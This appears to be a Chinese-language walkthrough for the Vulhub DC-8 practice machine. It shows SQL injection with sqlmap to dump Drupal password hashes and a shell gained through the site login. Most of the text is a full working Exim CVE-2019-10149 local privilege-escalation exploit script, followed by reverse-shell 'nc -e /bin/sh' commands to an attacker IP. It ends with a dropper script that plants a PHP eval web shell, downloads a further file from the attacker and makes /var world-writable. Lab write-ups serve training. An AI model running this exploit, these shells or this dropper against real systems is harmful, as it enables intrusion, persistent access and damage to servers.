Vulhub-DC-8靶场实战攻略

测试网页中的 Details 页面，发现可以通过 GET 传参数；加上单引号以后出现报错，说明存在 SQL 注入漏洞，于是通过 sqlmap 进行尝试。

 

sqlmap -u http://192.168.206.142/?nid=1 -D d7db --tables
sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users --columns
sqlmap -u http://192.168.206.142/?nid=1 -D d7db -T users -C name,pass --dump
+--------+---------------------------------------------------------+
| name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+
通过工具John对其进行破解
根据对 Drupal 的了解，其后台登录位置默认在 /user/login。
john
turtle
192.168.206.142/user/login
 
python -c 'import pty;pty.spawn("/bin/bash")'
find / -user root -perm -4000 -print 2>/dev/null
有一个exim4
/usr/sbin/exim4 --version
searchsploit exim
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home/kali/46996.sh
cat /home/kali/46996.sh
内容如下
#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method (overridden by "-m <method>" in the parser below)
# Recipient addresses carrying an Exim ${run{...}} string expansion — the
# CVE-2019-10149 primitive described in the header. Spaces and slashes are
# written as \t and \xNN escapes so the SMTP line itself contains neither;
# the command only materialises when Exim expands the recipient address.
# Defender note: "${run{" inside an RCPT TO argument (SMTP traffic or Exim
# logs) is the indicator for this technique.
# setuid payload: chown root + chmod 4755 on /tmp/pwned, the helper that the
# setuid branch below compiles as the unprivileged user.
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
# netcat payload: nc listener on port 31337 serving /bin/sh; the netcat branch
# below connects to it after a fixed wait.
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions — prints the supported -m methods to stdout, exits 1
usage() {
    local self=$0
    printf '%s [-m METHOD]\n\n' "$self"
    printf '%s\n' '-m setuid : use the setuid payload (default)'
    printf '%s\n' '-m netcat : use the netcat payload'
    printf '\n'
    exit 1
}

# payload delivery
# Speaks a minimal SMTP dialogue to the local Exim over a bash /dev/tcp socket
# and hands it $PAYLOAD (set by the caller) as the recipient address. Each
# "read -u 3" consumes exactly one reply line, so the order of reads and
# writes is fixed by the protocol. No reply code is inspected: a rejection is
# merely printed, and fd 3 is never closed explicitly.
function exploit()
{
    # connect to localhost:25
    # fd 3 becomes a read/write socket (the /dev/tcp technique credited in the
    # header); no nc/telnet binary is needed for the delivery itself.
    exec 3<>/dev/tcp/localhost/25

    # deliver the payload
    read -u 3 && echo $REPLY            # server greeting; $REPLY is unquoted, so whitespace collapses (cosmetic)
    echo "helo localhost" >&3
    read -u 3 && echo $REPLY
    echo "mail from:<>" >&3             # empty envelope sender
    read -u 3 && echo $REPLY
    echo "rcpt to:<$PAYLOAD>" >&3       # the recipient address IS the payload
    read -u 3 && echo $REPLY
    echo "data" >&3
    read -u 3 && echo $REPLY
    # 31 Received: headers — one more than Exim's default received_headers_max
    # (30); presumably this steers the message onto the delivery path where the
    # recipient address is expanded (see the Qualys advisory) — confirm there.
    for i in {1..31}
    do
        echo "Received: $i" >&3
    done
    echo "." >&3
    read -u 3 && echo $REPLY
    echo "quit" >&3
    read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
echo

# parse command line
# Only "-m <method>" is recognised; anything else prints usage and exits.
# A trailing "-m" with no value leaves METHOD empty (the second shift then
# complains harmlessly) and is caught by the emptiness check below.
while [ ! -z "$1" ]; do
    case $1 in
        -m) shift; METHOD="$1"; shift;;
        * ) usage
        ;;
    esac
done
# $METHOD is unquoted; with an empty METHOD this becomes the one-argument
# form "[ -z ]", which happens to evaluate true, so the guard still works.
if [ -z $METHOD ]; then
    usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

    # prepare a setuid shell helper to circumvent bash checks
    # (a setuid copy of bash alone would not keep root — bash resets its
    # effective uid unless started with -p — so the helper calls
    # setuid(0)/setgid(0) first). It is compiled here as the unprivileged
    # user; the PAYLOAD_SETUID expansion run by Exim only re-owns it to root
    # and sets mode 4755.
    echo "Preparing setuid shell helper..."
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
    gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
    if [ $? -ne 0 ]; then
        # fallback: a plain copy of /bin/sh. Whether that still keeps the
        # effective uid depends on which shell /bin/sh is (likely dash does,
        # bash does not); the script does not check.
        echo "Problems compiling setuid shell helper, check your gcc."
        echo "Falling back to the /bin/sh method."
        cp /bin/sh /tmp/pwned
    fi
    echo

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_SETUID
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    # Delivery (and therefore the expansion) happens asynchronously inside
    # Exim; the fixed 5 s wait is a guess, not a check. The ls shows whether
    # owner/mode changed (header expects "-rwsr-xr-x ... root").
    # Artefacts left behind: /tmp/pwned, /tmp/pwned.c and Exim's log entries.
    echo "Waiting 5 seconds..."
    sleep 5
    ls -l /tmp/pwned
    /tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_NETCAT
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    # Connects to the listener the PAYLOAD_NETCAT expansion is expected to
    # have started on 127.0.0.1:31337; if delivery failed, nc would simply
    # report the connection as refused.
    echo "Waiting 5 seconds..."
    sleep 5
    nc -v 127.0.0.1 31337

# print help
else
    usage
fi

为避免后期出现字符编码问题，本次用 vi 编辑这个 sh 文件，
编辑结束时执行
:set ff=unix
之后再次进入 输入
:set ff?
显示 fileformat=unix 才行。
之后正常如下操作即可
python -m SimpleHTTPServer
之后在靶机中
cd /tmp
wget http://192.168.206.128:8000/46996.sh
chmod 777 46996.sh
./46996.sh -m netcat
nc -e /bin/sh 192.168.206.128 10010


Getfile.sh
#!/bin/bash
# Post-exploitation dropper shown in the write-up. Runs with whatever
# privileges the caller already has; every step is unchecked and leaves
# obvious artefacts.
# cd failure is not checked; the echo below uses an absolute path anyway,
# but the touch, wget and first chmod are relative to the current directory.
cd /var/www/html/
# one-line PHP web shell (eval of POST parameter "1") appended to the web
# root; the touch is redundant since ">>" creates the file. Web-root
# file-integrity monitoring flags exactly this kind of write.
touch muma2.php
echo '<?php eval($_POST[1]);?>' >> /var/www/html/muma2.php
# reverse shell to the attacker host; the second line only runs after the
# first nc exits, so it is a retry, not a parallel connection
nc -e /bin/sh 192.168.206.128 10010
nc -e /bin/sh 192.168.206.128 10010
# fetches a second PHP file from the same host (its contents are not on this page)
wget http://192.168.206.128:8000/miansha.php
chmod 777 ./miansha.php
# makes everything under /var world-writable — destructive and very noisy
# (logs, spool, web root); a mass permission change like this is an easy
# detection signal
chmod -R 777 /var/*
